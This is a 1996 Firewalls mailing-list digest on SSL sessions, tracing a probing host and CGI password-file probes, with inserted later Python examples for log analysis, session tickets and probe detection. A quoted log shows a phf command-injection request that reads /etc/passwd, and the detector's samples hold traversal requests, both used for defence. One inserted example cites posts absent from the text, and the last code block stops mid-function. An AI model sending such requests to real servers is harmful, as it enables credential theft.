Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12777 for firewalls-outgoing; Fri, 12 Jul 1996 12:57:43 -0700 (PDT)
Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA12672 for ; Fri, 12 Jul 1996 12:57:16 -0700 (PDT)
From: mdr@vodka.sse.att.com
Received: from ihgw2.att.com by relay3.UU.NET with SMTP
Received: from vodka.sse.att.com by ihig2.att.att.com (SMI-8.6/EMS-1.2 sol2)
Message-Id: <199607121640.LAA08295@ihig2.att.att.com>
Subject: Re: Extending Financial Applications And Protecting via a Firewall
To: allyn@allyn.com (Mark Allyn 206-860-9454)
Date: Fri, 12 Jul 1996 12:46:13 -0400 (EDT)
Cc: howzit@worldnet.att.net, Firewalls@GreatCircle.COM
In-Reply-To: <199607120238.TAA04199@mark.allyn.com> from "Mark Allyn 206-860-9454" at Jul 11, 96 07:38:18 pm
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mark Allyn wrote:
>
> Best solution is to use the secure socket layer (SSL) that Netscape
> has already built into their web browsers. You would need the
> domestically available 128 bit key version; not the exportable
> 40 bit key version that has been decrypted via brute force

[snip]

>
> Then set up password authentication on your web server. Since you
> will be using SSL, the username and password will be passed under
> cover over the net and cannot be sniffed.

How will you maintain a "session" for the user? Remember http is stateless. I've heard of people using cookies or hidden fields for this type of session maintenance, does anybody know the details of how this is done and whether or not it is secure?

What about spoofing the remote host via DNS hacks?
If I can divert the user's browser to a mirror site and trick them into revealing their password, then the game is up. End-to-end encryption doesn't defeat man-in-the-middle (or wrong-man-to-start-with) unless you use some form of strong authentication. Does the current generation of SSL support public certificates of the servers to prevent such?

I skipped ahead to the SSL 3.0 docs and it does support certificates and sessions. Guess I'll have to go back and read the 2.0 docs.

The Open Market product maintains sessions by passing the user a "ticket" embedded in the URL. It's really a pretty slick scheme that works with unmodified browsers. However I'm not sure whether or not the industry will rally around that type of approach or go for something else.

How do you see password schemes w.r.t client certificates? The password has the advantage of travelling with the user so that s/he can gain access from any site. However passwords may be guessable. The SSL encryption at least prevents sniffing the password, but the password still has the undesirable quality that it has to be given away to be used.

>
> On this server, along with the SSL capable web server, install
> the Oracle SQL Net client software. Don't install the database
> itself here. That should be installed on another machine on
> the company's internal network. Actually, best here to install the
> newer Oracle Secure SQL Net on both the web server and the internal
> machine with the Oracle database. Be careful though, the Oracle
> database must be of a certain revision (7.3, I believe), in order
> for secure SQL net to work.

Is there an open solution that would work with any database?

>
> Install this secure dedicated web server on its own lan
> segment between two filters. The outer filter should allow only
> http traffic from the outside to touch the web server. No mail,
> telnet, ftp, or anything else.
> The inside filter should allow only
> SQL Net traffic to go from the web server to the inside network
> and only to the one machine that has the database. Nothing
> else should be allowed through the inside filter except for
> possibly telnet FROM the INSIDE to the web server to facilitate
> maintenance on it, although best is to do all maintenance on
> the box itself from the console. Probably best to have both
> boxes in the same (secured) physical location to facilitate
> maintenance.

Good ideas. One problem: Host security. The SQL/Web server is still an attack point. If the host becomes compromised, then the attacker could launch bogus SQL requests. I think that client certificates are part of the answer here. Of course they only force the attacker to be a customer of the financial firm (or compromise the user's PC), but that's a step forward. Another approach is to use intrusion detection software on the host to monitor the SQL and Http servers.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Fri Jul 12 15:11:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA17803 for firewalls-outgoing; Fri, 12 Jul 1996 13:38:13 -0700 (PDT)
Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA17793 for ; Fri, 12 Jul 1996 13:38:05 -0700 (PDT)
Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id NAA11275; Fri, 12 Jul 1996 13:28:12 -0700 (PDT)
Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3)
Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id NAA19347; Fri, 12 Jul 1996 13:33:59 -0700 (PDT)
From: Brian Murrell
Message-Id: <199607122033.NAA19347@mocha.bctel.net>
Date: Fri, 12 Jul 1996 13:33:58 -0700 (PDT)
To: bve@omsk.yourtown.com
Cc: firewalls@GreatCircle.COM
Subject: Re[2]: Dirty Dogs
In-Reply-To: <9607120022.AA13435@omsk.yourtown.com>
X-Mailer: Ishmail 1.2.2-960610-sol24
MIME-Version: 1.0
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

from the quill of bve@omsk.yourtown.com (BVE) on scroll
<9607120022.AA13435@omsk.yourtown.com>
> 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET
> /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
>
> whois -h rs.internic.net 152.169.232.0
> No match for "152.169.232.0".
>
> This person seems to have covered their tracks pretty well. Any ideas on
> tracking them??

Not really. You just have to know how to ask the whois servers. 152.* is a class b address. I would first try a class c lookup in case it has been subnetted and registered...

$ whois 152.169.232 | more
No match for "152.169.232".

The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

failing that, try the class b...

$ whois 152.169 | more
Advanced Network & Services, Inc. (NET-ANS-BNET14)
   100 Clearbrook Rd
   Elmsford, NY 10523

   Netname: ANS-BNET14
   Netnumber: 152.169.0.0

   Coordinator:
      Mackey, Bruce  (BM814)  Mackey@AOL.COM
      703-453-4414

   Alternate Contact:
      ANS Network Operations Center  (ANS-NOC)  noc@ans.net
      1-800-456-6300

   Domain System inverse mapping provided by:

   HP81.PROD.AOL.NET            192.203.190.18
   OPS01.OPS.AOL.COM            152.163.80.11
   DNS-AOL.ANS.NET              198.83.210.28

   Record last updated on 29-Nov-95.

The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

There you go. ANS. That was likely doled out to somebody, so call ANS and ask them. If they aren't going to go to the effort of updating the whois database, they should be expected to answer queries about who owns it.

That reminds me, the CA registrar owes me a phone call...

b.

--
Brian J. Murrell                       Brian_Murrell@bctel.net
BCTel Advanced Communications          brian@ilinx.com
Vancouver, B.C.
brian@wimsey.com                       604 454 5279

From firewalls-owner Fri Jul 12 15:17:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA23410 for firewalls-outgoing; Fri, 12 Jul 1996 14:16:21 -0700 (PDT)
Received: from wichita.fn.net (wichita.fn.net [204.233.71.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA23343 for ; Fri, 12 Jul 1996 14:15:58 -0700 (PDT)
Received: (from bkmarsh@localhost) by wichita.fn.net (8.7.4/8.6.9) id QAA05927; Fri, 12 Jul 1996 16:12:43 -0500 (CDT)
Date: Fri, 12 Jul 1996 16:12:40 -0500 (CDT)
From: "Bruce M."
X-Sender: bkmarsh@wichita.fn.net
To: firewalls@GreatCircle.COM
Subject: Re: Freeware
In-Reply-To: <9607121457.AA42616@pamela.sic.se>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jul 1996, Stefan Berg wrote:

> My experience with freeware or any other firewall software for that
> matter is that it very much depends on _configuration_ rather than
> the quality of the software.
>
> I mean, what's the use of a super_duper_mega_expensive_and_great firewall
> if you don't know how to set it up in a secure fashion?

True. But what is the good of a simple proxy server if it won't let you implement the types of restrictions and privileges that you want to allow? Basically, you need a precise mix of both good configuration and good quality. Some people aren't willing to pay for both.

From firewalls-owner Fri Jul 12 15:18:01 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA24657 for firewalls-outgoing; Fri, 12 Jul 1996 14:23:52 -0700 (PDT)
Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA24366 for ; Fri, 12 Jul 1996 14:22:34 -0700 (PDT)
Received: from saturn by sun.aitc.rest.tasc.com (NX5.67e/NX3.0M)
From: "Philip C. Hyland"
Message-Id: <9607122218.AA01536@sun.aitc.rest.tasc.com>
Received: by saturn.aitc.rest.tasc.com (NX5.67d/NX3.0X)
Date: Fri, 12 Jul 96 17:26:49 -0300
Received: by NeXT.Mailer (1.100)
Received: by NeXT Mailer (1.100)
To: firewalls@GreatCircle.com
Subject: What Parameters are Critical to Firewall Mgt?
Cc: pchyland@tasc.com
Reply-To: pchyland@tasc.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am trying to develop the basics of a firewall MIB. From an administrative and security monitoring point of view, I need to know what are key to detecting problems, and which items need to be changed in response to different conditions.

I am interested in contacting others who have an interest or knowledge of firewall security applications that may benefit from a consolidated management concept. Referrals to key personnel in software research and development and security operations would be highly appreciated.

My overall research goal is to use SNMP to instrument security applications (such as an IDS, firewalls or S-HTTP) in order to provide more effective configuration, status and control. My belief is that a common security management framework that interacts with several different applications may be a more efficient and effective tool than several standalone tools. References to any previous/related work in this area would be useful.

Thanks.
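An added example, not part of either post: Rob Sansom's Cisco ACL records earlier in this digest and Philip Hyland's question about which firewall counters matter meet in the same place, namely reducing raw deny records to per-flow and per-port totals that a management system (or a MIB, as Philip proposes) could export and alarm on. The code below is mine, not Rob's, Philip's or Cisco's; the sample input is a copy of the records Rob posted, including the truncated last line, and the thresholds in suspicious_sources are assumptions chosen to fit that sample.

```python
import re
from collections import defaultdict

# Constructed sample: the Cisco IOS ACL log records from Rob Sansom's post,
# including the truncated last line exactly as it appears in his message.
SAMPLE_LOG = """\
Jul 11 20:23:20 gate247159.connectix.com 8774: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 1 packet
Jul 11 20:29:09 gate247159.connectix.com 8775: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 117 packets
Jul 11 20:33:29 gate247159.connectix.com 8776: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 1 packet
Jul 11 20:34:09 gate247159.connectix.com 8777: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1558) -> 204.247.159.244(110), 89 packets
Jul 11 20:39:09 gate247159.connectix.com 8778: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 136 packets
Jul 11 20:43:35 gate247159.connectix.com 8779: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 1 packet
Jul 11 20:45:09 gate247159.connectix.com 8780: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1766) -> 204.247.159.244(110), 120 packets
Jul 11 20:49:09 gate247159.connectix.com 8781: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 271 packets
Jul 11 20:53:34 gate247159.connectix.com 8782: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1679) -> 204.247.159.244(110), 1 packet
Jul 11 20:54:09 gate247159.connectix.com 8783: %SEC-6-IPACCESSLOGP: list 120 denied tcp 206.129.83.142(1337) -> 204.247.159.244(110), 195 packets
Jul 11 20:56:08 gate247159.connectix.com 8784: %SEC-6-IPACCESSLOGP: list 120
"""

# One IPACCESSLOGP record: "list <acl> <action> <proto> <src>(<sport>) -> <dst>(<dport>), <n> packet(s)".
ACL_RE = re.compile(
    r"%SEC-6-IPACCESSLOGP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>\w+) (?P<src>[\d.]+)\((?P<sport>\d+)\) -> "
    r"(?P<dst>[\d.]+)\((?P<dport>\d+)\), (?P<count>\d+) packets?"
)


def parse_acl_line(line):
    """Return the record fields as a dict, or None for lines that are not complete records."""
    m = ACL_RE.search(line)
    if m is None:
        return None
    rec = m.groupdict()
    for k in ("sport", "dport", "count"):
        rec[k] = int(rec[k])
    return rec


def summarize(log_text):
    """Aggregate records into per-flow totals and the per-(dst, port) denied counters
    a firewall MIB might export. Returns (flows, denied_by_port, unparsed_lines)."""
    flows = defaultdict(lambda: {"packets": 0, "records": 0, "sports": set()})
    denied_by_port = defaultdict(int)
    unparsed = 0
    for line in log_text.splitlines():
        rec = parse_acl_line(line)
        if rec is None:
            unparsed += 1          # truncated or foreign line: count it, do not guess
            continue
        key = (rec["acl"], rec["action"], rec["proto"], rec["src"], rec["dst"], rec["dport"])
        flow = flows[key]
        flow["packets"] += rec["count"]
        flow["records"] += 1
        flow["sports"].add(rec["sport"])   # each new client port is a fresh connection attempt
        if rec["action"] == "denied":
            denied_by_port[(rec["dst"], rec["dport"])] += rec["count"]
    return flows, denied_by_port, unparsed


def suspicious_sources(flows, min_packets=100, min_sessions=3):
    """Flag denied flows where one source keeps retrying a closed port: many packets
    spread over several client ports, rather than a single stray connection."""
    hits = []
    for (acl, action, proto, src, dst, dport), flow in flows.items():
        if action != "denied":
            continue
        if flow["packets"] >= min_packets and len(flow["sports"]) >= min_sessions:
            hits.append({"acl": acl, "src": src, "dst": dst, "dport": dport,
                         "packets": flow["packets"], "sessions": len(flow["sports"])})
    return sorted(hits, key=lambda h: -h["packets"])


if __name__ == "__main__":
    flows, by_port, bad = summarize(SAMPLE_LOG)
    for hit in suspicious_sources(flows):
        print(hit)
    print("unparsed lines:", bad)
```

On Rob's sample this yields one flagged source, 206.129.83.142, with 932 denied packets to port 110 across four client ports, and one unparsed line. The pairs of a "1 packet" record followed by a large count for the same client port are how IOS ACL logging reports: the first match is logged at once and later matches are summarized at intervals, so the packet totals, not the number of syslog lines, are the figure worth exporting.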
From firewalls-owner Fri Jul 12 15:26:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA22891 for firewalls-outgoing; Fri, 12 Jul 1996 14:13:32 -0700 (PDT)
Received: from red8.cac.washington.edu (red8.cac.washington.edu [140.142.55.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA22682 for ; Fri, 12 Jul 1996 14:12:49 -0700 (PDT)
Received: from localhost by red8.cac.washington.edu
Date: Fri, 12 Jul 1996 14:09:37 -0700 (PDT)
From: Dave Dittrich
Reply-To: Dave Dittrich
To: Firewalls@GreatCircle.COM
Subject: Re: Dirty dogs
In-Reply-To: <199607121951.MAA11778@miles.greatcircle.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> whois -h rs.internic.net 152.169.232.0
> No match for "152.169.232.0".
> ...
> ...and nslookup:
>
> nslookup 152.169.232.79
> Server: omsk.yourtown.com
> Address: 205.246.66.7
>
> Name: [152.169.232.79]
> Address: 152.169.232.79
>
> - -----------------------------
>
> This person seems to have covered their tracks pretty well. Any ideas on
> tracking them??

Try "traceroute" for IP addresses with no DNS names:

# traceroute to 152.169.232.79 (152.169.232.79), 30 hops max, 40 byte packets
 ...
16  enss150.t3.ans.net (204.151.29.10)  125 ms  121 ms  129 ms
17  inet3-gw.blue.aol.com (198.81.0.43)  121 ms  117 ms  117 ms
18  * inet5-gw.blue.aol.com (152.163.15.2)  121 ms  117 ms
19  inet6-gw.blue.aol.com (152.163.15.26)  152 ms *  121 ms
20  inet15-gw.blue.aol.com (152.163.15.77)  117 ms  117 ms  199 ms
21  iptr2-r3.proxy.aol.com (152.163.193.60)  219 ms  117 ms  117 ms
22  ipt-i1.blue.aol.com (152.163.191.121)  121 ms  117 ms  148 ms
23  ipt-i1.blue.aol..com (152.163.191.121)  125 ms !H  125 ms !H  117ms !H

It looks like you want to talk to AOL administrators.
--
Dave Dittrich                    Client Services, Computing & Communications
dittrich@cac.washington.edu      University of Washington

Dave Dittrich / dittrich@cac.washington.edu

From firewalls-owner Fri Jul 12 15:36:57 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA29171 for firewalls-outgoing; Fri, 12 Jul 1996 14:52:45 -0700 (PDT)
Received: from case.cyberspace.com (case.cyberspace.com [199.2.48.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA29159 for ; Fri, 12 Jul 1996 14:52:39 -0700 (PDT)
Received: from case.cyberspace.com ([199.2.48.12]) by case.cyberspace.com
Date: Fri, 12 Jul 1996 14:50:24 -0700 (PDT)
From: billcurr@cyberspace.com (Bill Curr)
To: firewalls@GreatCircle.COM
Subject: Microsoft FrontPage
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know this is not specifically on Firewalls, though it may lead to some discussion on where to place Web servers... what is the feeling regarding MicroSoft's FrontPage, particularly the Server Extensions? This seems to be a new breed of product giving the user some (limited) sysadmin privileges... personally the product makes me nervous, particularly the way it handles CGI and .SHTML files... this is not because I am a MicroPhobe as I run NT Server.

Any thoughts or experiences out there? Thanks.
-Bill

From firewalls-owner Fri Jul 12 15:51:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA26018 for firewalls-outgoing; Fri, 12 Jul 1996 14:32:40 -0700 (PDT)
Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA25896 for ; Fri, 12 Jul 1996 14:32:09 -0700 (PDT)
Received: from mail.amer.net by relay7.UU.NET with ESMTP
Date: Fri, 12 Jul 1996 12:30:31 -0400 (EDT)
Message-Id:
Received: from mail.amer.net ([205.229.116.59]) by mail.amer.net
X-Sender: jsong@mail.amer.net
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: Ginger
Subject: Who should Handle Data Encryption?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Would anyone like to share your experience regarding secure data transfer on the Internet/Intranet: Should our network people set up secure (i.e., data encryption) communication channels for all protocols, or should we mainly install a file encryption utility and let the user decide which application is necessary to be encrypted?

The concern here is that the 1st option may be secure but slow down the entire data communication; the 2nd option may have efficient data communication but user-training and implementation of security-policy can be hectic. Maybe there is a middle-way to handle this?
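Mark Riggins asked earlier in this digest how a "session" is kept over stateless HTTP once SSL has protected the password, and whether the cookie, hidden-field or Open Market style URL "ticket" approaches are secure. As an added example, not from Mark's post or from any of the products named in the thread, here is the shape of a ticket that can be handed back to the browser without the server keeping state: the user name and an expiry time, bound by an HMAC under a server-only key, so the client can read it but cannot alter it. The key, the 15-minute lifetime and the helper names are my assumptions.

```python
import base64
import hashlib
import hmac
import os

TAG_LEN = hashlib.sha256().digest_size   # 32 bytes of HMAC appended to every ticket

# Constructed key: generated at server start and never sent to the client.
SERVER_KEY = os.urandom(32)


def _tag(payload, key):
    return hmac.new(key, payload, hashlib.sha256).digest()


def issue_ticket(user, now, ttl=900, key=None):
    """Build "user|expiry" + HMAC and base64 it for transport in a cookie."""
    key = SERVER_KEY if key is None else key
    payload = f"{user}|{int(now) + ttl}".encode()
    return base64.urlsafe_b64encode(payload + _tag(payload, key)).decode()


def verify_ticket(ticket, now, key=None):
    """Return the user name if the ticket is authentic and unexpired, else None."""
    key = SERVER_KEY if key is None else key
    try:
        raw = base64.urlsafe_b64decode(ticket.encode())
        payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
        user, expiry = payload.decode().rsplit("|", 1)
        expiry = int(expiry)
    except (ValueError, UnicodeDecodeError):
        return None                      # malformed: treated exactly like a bad signature
    if not hmac.compare_digest(tag, _tag(payload, key)):   # constant-time compare
        return None
    if int(now) >= expiry:
        return None
    return user


def rewrite_user(ticket, new_user):
    """What a client can do without the key: edit the user field and keep the old tag.
    Included only to show that verify_ticket rejects the result."""
    raw = base64.urlsafe_b64decode(ticket.encode())
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    _, expiry = payload.decode().rsplit("|", 1)
    return base64.urlsafe_b64encode(f"{new_user}|{expiry}".encode() + tag).decode()


if __name__ == "__main__":
    import time
    t = issue_ticket("alice", time.time())
    print("genuine:", verify_ticket(t, time.time()))
    print("edited :", verify_ticket(rewrite_user(t, "bob"), time.time()))
```

Two points from the thread carry over. First, the ticket is only as private as the channel: it must travel under SSL, otherwise it is sniffable just like the password it replaces. Second, where it travels matters: a ticket embedded in the URL, as in the Open Market scheme Mark describes, ends up in browser history, proxy logs and the Referer header of every outbound link, whereas a cookie does not, so a cookie with a short expiry is the safer carrier for the same token.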
From firewalls-owner Fri Jul 12 15:52:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA29235 for firewalls-outgoing; Fri, 12 Jul 1996 14:53:20 -0700 (PDT)
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA29213 for ; Fri, 12 Jul 1996 14:53:08 -0700 (PDT)
Received: from lexicon.ins.com by relay1.UU.NET with ESMTP
Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id KAA10706 for ; Fri, 12 Jul 1996 10:12:04 -0700 (PDT)
Message-Id: <2.2.32.19960712170812.00bf1cd8@ins.com>
X-Sender: martin_d@ins.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 12 Jul 1996 13:08:12 -0400
To: firewalls@greatcircle.com
From: Darwin Martinez
Subject: RealAudio2
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

All:

I've upgraded FW-1 to ver 2.1 for supporting real audio 2. I see the "radio" tcp connect go out, but FW-1 is blocking the return udp service. My rulebase is setup to allow tcp / udp real audio, but I'm still blocking it.

Anyone using FW-1 & real audio? If so, I'd appreciate any suggestions.

Thanks in advance.

------------------------------------------------------------------------
Darwin L. Martinez                 Email: darwin_martinez@ins.com
Network Systems Engineer           Site #: 404-843-5954
International Network Services     Pager: 800-INS-1-INS
Atlanta Office
"To run with the big dogs, you gotta get off the porch!"
------------------------------------------------------------------------

From firewalls-owner Fri Jul 12 16:03:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05091 for firewalls-outgoing; Fri, 12 Jul 1996 15:40:29 -0700 (PDT)
Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05066 for ; Fri, 12 Jul 1996 15:40:19 -0700 (PDT)
Received: from phoenix.iss.net by relay4.UU.NET with SMTP
Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA02443; Fri, 12 Jul 1996 10:45:10 -0400
Message-Id: <199607121445.KAA02443@phoenix.iss.net>
Comments: Authenticated sender is
From: "Alex F"
Organization: Internet Security Systems, Inc.
To: Darren Reed
Date: Fri, 12 Jul 1996 10:46:18 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: firewall certification (was Re: NCSA)
Reply-to: alexf@iss.net
CC: firewalls@GreatCircle.COM
X-mailer: Pegasus Mail for Win32 (v2.32a)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> What's more, I seem to get rather interesting advertising material from
> a local reseller of ISS's scanner which points out that a number of
> commercial firms which do auditing and consulting use it to verify or
> audit firewalls. Whilst it is a start, it is by no means comprehensive

I don't know what that particular reseller is doing with the scanner as far as firewall audits go (I'm sure someone here does though). You are correct. It is a start, but by no means complete. NCSA uses our scanner for the same purposes here in the US, but it is used in conjunction with other tests (mostly "homegrown" by the NCSA, I imagine). Using ONLY the scanner to certify firewalls *can* mislead the end consumer, especially since our scanner is more of a general network prober than a specific firewall tester.
We here at ISS realize this and are working on expanding our product line greatly in the coming few months. We will be selling an actual suite of applications (called SAFEsuite). We will be selling scanners that are more suited to specific situations. IOW, in addition to our Scanner, we will be selling a COPS-type of internal scanner, a firewall specific scanner, and others (all of this stuff is being ported to NT as well for those who wish to use NT over UNIX).

It might be prudent to ask the reseller what else they are using to test the firewalls (homegrown tests, etc.). I imagine (though *I* do not know for sure) that their tests encompass a greater range of tests on firewalls than just what is in the scanner.

Alex F

=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F                  alexf@iss.net
Marketing Specialist    Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Fri Jul 12 16:19:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09087 for firewalls-outgoing; Fri, 12 Jul 1996 16:01:53 -0700 (PDT)
Received: from kimberlite.wwonline.com (kimberlite.wwonline.com [206.47.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA09015 for ; Fri, 12 Jul 1996 16:01:32 -0700 (PDT)
Received: from kimberlite.wwonline.com (ts04p02.wwonline.com [206.47.108.179]) by kimberlite.wwonline.com (8.7.5/8.7.2) with SMTP id SAA03704 for ; Fri, 12 Jul 1996 18:57:14 -0400 (EDT)
Date: Fri, 12 Jul 1996 18:57:14 -0400 (EDT)
Message-Id: <199607122257.SAA03704@kimberlite.wwonline.com>
X-Sender: bhalla@wwonline.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
From: N Bhalla
Subject: CGI Security Leak !!
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

A few days back .. maybe a week or so I saw a part of a syslog that mentioned something about some script that was trying to obtain access to the password files ..
It contained the part %/etc/password% or something like that. I would appreciate it if someone could repost that and any blocks against that .. as I would like to block it off my system.

Thanks

Nishchal

From firewalls-owner Fri Jul 12 16:54:01 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA16173 for firewalls-outgoing; Fri, 12 Jul 1996 16:38:46 -0700 (PDT)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA16021 for ; Fri, 12 Jul 1996 16:38:13 -0700 (PDT)
Received: from darkwing.pacific.net.sg by relay2.UU.NET with SMTP
Received: (qmail-queue invoked from smtpd); 12 Jul 1996 05:28:32 -0000
Received: from darkwing.pacific.net.sg (203.120.89.89)
Date: Fri, 12 Jul 1996 13:28:32 +0800 (SST)
From: Ng Pheng Siong
To: Matthew Keenan
cc: BVE , firewalls@GreatCircle.COM
Subject: Re: Dirty Dogs
In-Reply-To: <199607120427.OAA03656@shekel.firstpac.com.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jul 1996, Matthew Keenan wrote:

> and try snmp probing the routers closest to the target address.

Querying whois and dns is one thing, but some sites might conceive your probing their routers as hostile action.

For the list: Would you? Would you detect it? ;)

Cheers.
- PS

--
Ng Pheng Siong              * Finger for PGP key.
Pacific Internet Pte Ltd    * Singapore
Fast, secure, cheap. Pick two.
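N Bhalla's question above is about recognising the `/etc/passwd` probe in a web server's log so it can be blocked. The following is an added example of that detection, not code from the original posts: it scans Common Log Format lines, URL-decodes each request target until it stops changing (so a double-encoded `%252f` is not missed), and flags any request that names a system password file or climbs out of the document root with `..`. The log lines, client addresses and CGI script names are constructed for the example.

```python
"""Flag web requests that probe for the system password file or use
'..' traversal, the kind of syslog entry the post above describes.
Added example; the sample log and every host in it are constructed."""
import re
from urllib.parse import unquote

# Constructed Common Log Format entries; no real hosts or scripts.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jul/1996:18:20:01 -0400] "GET /index.html HTTP/1.0" 200 1043
192.0.2.10 - - [12/Jul/1996:18:20:05 -0400] "GET /cgi-bin/somescript?file=/etc/passwd HTTP/1.0" 404 0
198.51.100.7 - - [12/Jul/1996:18:21:13 -0400] "GET /cgi-bin/view?file=../../../../etc/passwd HTTP/1.0" 403 0
198.51.100.7 - - [12/Jul/1996:18:21:14 -0400] "GET /cgi-bin/view?file=..%252f..%252fetc%252fpasswd HTTP/1.0" 403 0
203.0.113.4 - - [12/Jul/1996:18:22:40 -0400] "GET /docs/passwords-policy.html HTTP/1.0" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# /etc/password is the spelling quoted in the post; match it too.
PASSWORD_FILE_RE = re.compile(r"/etc/(passwd|password|shadow)\b", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def decode_target(target, max_rounds=4):
    """URL-decode repeatedly until the string stops changing.
    Returns (decoded, number_of_rounds_that_changed_something)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
        rounds += 1
    return target, rounds


def inspect_target(target):
    """Return (decoded target, decode rounds, list of reasons to flag)."""
    decoded, rounds = decode_target(target)
    reasons = []
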